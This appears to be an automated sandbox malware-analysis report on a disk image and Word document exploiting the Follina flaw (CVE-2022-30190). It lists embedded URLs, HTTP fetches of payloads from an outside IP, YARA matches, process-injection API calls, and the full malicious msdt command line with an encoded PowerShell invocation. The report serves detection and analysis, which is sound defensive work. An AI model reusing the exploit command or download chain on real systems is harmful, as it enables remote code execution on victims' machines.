Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://invites.office.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://lifecycle.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://login.windows.local
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://management.azure.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://management.azure.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://messaging.engagement.office.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://messaging.office.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://ncus.contentsync.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://ncus.pagecontentsync.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://officeapps.live.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://onedrive.live.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://onedrive.live.com/embed?
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://osi.office.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://otelrules.azureedge.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://outlook.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://outlook.office.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://outlook.office365.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://outlook.office365.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://pages.store.office.com/review/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://powerlift.acompli.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://roaming.edog.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://settings.outlook.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://staging.cortana.ai
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://store.office.cn/addinstemplate
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://store.office.de/addinstemplate
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://tasks.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://web.microsoftstream.com/video/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://webshell.suite.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://wus2.contentsync.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://wus2.pagecontentsync.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic | HTTP traffic detected:
    GET /123.RES HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: 185.234.247.119
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /123.RES HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: 185.234.247.119
    If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
    If-None-Match: "6299dd5d-1861"
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /1240405476.dat HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: 185.234.247.119
    Connection: Keep-Alive
Source: 00000013.00000002.807689748.0000000003340000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000013.00000002.807640335.0000000003050000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000013.00000002.805909900.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000013.00000002.806003549.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: Process Memory Space: msdt.exe PID: 6148, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008C358D
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008C2988
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008C8240
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008C670F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008C6350
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049C358D
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049C2988
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049C8240
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049C670F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049C6350
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AB2988
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AB358D
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AB8240
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AB670F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AB6350
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_04822988
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0482358D
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_04828240
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0482670F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_04826350
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049BD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049BD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AAD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AAD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0481D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0481D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
Source: DiagPackage.dll.19.dr | Static PE information: No import functions for PE file found
Source: DiagPackage.dll.mui.19.dr | Static PE information: No import functions for PE file found
Source: DiagPackage.dll.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: jr3.dll
Source: unknown | Driver loaded: C:\Windows\System32\drivers\udfs.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o "
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220607
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c33guzif.vqh.ps1
Source: classification engine | Classification label: mal84.troj.expl.evad.winIMG@27/33@0/1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008BE400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049BB96A CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{EED88676-5DBA-42BA-A514-EEBD7864A628}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: 68101181_048154.img | Static file information: File size 2686976 > 1048576
Source: Binary string: amstream.pdb source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008CB02E push ebx; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008B01B0 pushad ; iretd
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008CAD7C push cs; iretd
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008CAE7E push cs; iretd
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008CCB5D push esi; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049CB02E push ebx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049B01B0 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049CAD7C push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049CAE7E push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049CCB5D push esi; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04ABB02E push ebx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AA01B0 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04ABAD7C push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04ABAE7E push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04ABCB5D push esi; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0482B02E push ebx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_048101B0 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0482AD7C push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0482AE7E push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0482CB5D push esi; iretd
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008BEEBB LoadLibraryA,GetProcAddress,
